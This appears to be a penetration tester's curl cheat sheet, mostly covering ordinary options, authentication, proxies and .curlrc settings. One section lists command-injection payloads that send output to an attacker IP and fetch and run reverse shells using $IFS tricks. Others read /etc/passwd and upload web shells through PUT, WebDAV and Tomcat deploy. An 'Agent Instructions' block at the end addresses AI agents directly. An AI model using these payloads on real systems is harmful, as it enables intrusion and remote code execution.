# Curl * Common commands ```bash # -d, --data HTTP POST data # -f, --fail Fail silently (no output at all) on HTTP errors # -i, --include Include protocol response headers in the output # -o, --output Write to file instead of stdout # -O, --remote-name Write output to a file named as the remote file # -s, --silent Silent mode # -T, --upload-file Transfer local FILE to destination # -A, --user-agent Send User-Agent to server # -v, --verbose Make the operation more talkative # -V, --version Show version number and quit # -u, --user Server user and password ## ------------------| Read local files curl file:///etc/passwd ## ------------------| Execute commands curl http://10.10.14.26/$(whoami) curl http://10.10.14.26/$(which$IFS'curl') curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php') curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh') curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh) ## ------------------| Basic curl -L http://h4rithd.com ### Follow redirects curl -I http://h4rithd.com ### Fetch headers only curl -O http://h4rithd.com/file.txt. ### Download a file with its original name curl -o b.zip http://h4rithd.com/a.zip ### Download file and rename curl -C - -O http://h4rithd.com/a.zip ### Resume an interrupted download curl --compressed http://h4rithd.com ### Request compressed response (gzip, deflate) curl -4 http://h4rithd.com ### Force IPv4 curl -6 http://h4rithd.com ### Force IPv6 ## ------------------| Authentication curl -u username:password http://h4rithd.com ### Basic authentication curl --basic -u user:pass http://h4rithd.com ### Explicitly use basic authentication curl --digest -u user:pass http://h4rithd.com ### Digest authentication curl --ntlm -u user:pass http://h4rithd.com ### NTLM authentication ## ------------------| Cookies curl -b cookies.txt http://h4rithd.com ### Send cookies from a file curl -c cookies.txt http://h4rithd.com ### Save received cookies to a file curl -b "name=value" http://h4rithd.com ### Send cookies inline ## ------------------| Uploading Files curl -T file.txt ftp://h4rithd.com/ ### Upload a file to FTP curl -T file.txt -u user:pass ftp://h4rithd.com/ ### Upload with authentication curl -F "file=@a.zip" http://h4rithd.com/upload ### Upload file with multipart form ## ------------------| Debugging & Verbose Output curl -v http://h4rithd.com ### Verbose output (see request/response headers) curl -i http://h4rithd.com ### Show response headers curl -s http://h4rithd.com ### Silent mode (no progress output) curl --trace trace.txt http://h4rithd.com ### Save request/response trace to a file curl --trace-ascii trace.txt http://h4rithd.com ### ASCII-only trace file ## ------------------| Rate Limiting & Timeout curl --limit-rate 100k http://h4rithd.com/a.zip ### Limit download speed curl --max-time 10 http://h4rithd.com ### Timeout after 10 seconds curl --connect-timeout 5 http://h4rithd.com ### Timeout if connection takes more than 5 seconds ## ------------------| Handling SSL & Certificates curl -k https://h4rithd.com ### Ignore SSL certificate errors curl --cacert ca.pem https://h4rithd.com ### Use a custom CA certificate curl --ssl-reqd ftp://h4rithd.com/ ### Require SSL/TLS for FTP curl --cert client.pem --key client.key https://h4rithd.com ### Use client certificate authentication ## ------------------| Parallel Requests curl -Z http://h4rithd.com/a http://h4rithd.com/b ### Download multiple files in parallel curl -O http://h4rithd.com/a -O http://h4rithd.com/b ### Download multiple files sequentially ## ------------------| Handling FTP curl -u user:pass ftp://h4rithd.com/file.txt ### Download a file via FTP curl -u user:pass -T file.txt ftp://h4rithd.com/ ### Upload a file via FTP curl -u user:pass ftp://h4rithd.com/ -Q "DELE file.txt" ### Delete a file via FTP ``` * Use PUT command to upload file ```bash curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx # If DEV available ? curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php # Upload war file to tomcat curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd ``` * Use MOVE command to move file ```bash curl -X MOVE http://10.10.10.15/h4rithd.html -H 'Destination:http://10.10.10.15/h4rithd.aspx' ``` * `.curlrc` file ```bash ## ------------------| Basic Settings user-agent = "Mozilla/5.0" ### Set a default User-Agent referer = "https://h4rithd.com" ### Set a default Referer header = "X-Custom-Header: myvalue" ### Set a custom header compressed ### Enable gzip/deflate compression by default location ### Follow redirects max-time = 30 ### Set a timeout for requests (seconds) connect-timeout = 10 ### Timeout for connection attempts (seconds) retry = 3 ### Number of retry attempts on transient errors ipv4 ### Force using IPv4 ipv6 ### Force using IPv6 fail ### Fail silently on HTTP errors silent ### Suppress progress output output = "output.txt" ### Save response to a file by default ## ------------------| Authentication & Credentials user = "username:password" ### Set default credentials for authentication proxy-user = "proxyuser:proxypass" ### Set credentials for a proxy server netrc ### Use .netrc for authentication ## ------------------| Proxy Settings proxy = "http://127.0.0.1:8080" ### Set an HTTP proxy proxy = "socks5://127.0.0.1:1080" ### Use a SOCKS5 proxy noproxy = "localhost,127.0.0.1,a.com" ### Exclude domains from proxy usage ## ------------------| SSL & Certificates insecure ### Ignore SSL certificate validation errors cacert = "/path/to/cacert.pem" ### Specify a custom CA certificate cert = "/path/to/client.crt" ### Specify a client certificate key = "/path/to/client.key" ### Specify a private key file ## ------------------| Cookie & Session Management cookie = "name=value" ### Set default cookies cookie-jar = "/path/to/cookies.txt" ### Save cookies after execution cookie-file = "/path/to/cookies.txt" ### Load cookies from a file ## ------------------| Debugging & Logging verbose ### Enable verbose mode for debugging trace = "/path/to/trace.log" ### Save request/response trace to a file trace-ascii = "/path/to/trace.txt" ### Save ASCII-only trace output ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/other/curl.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.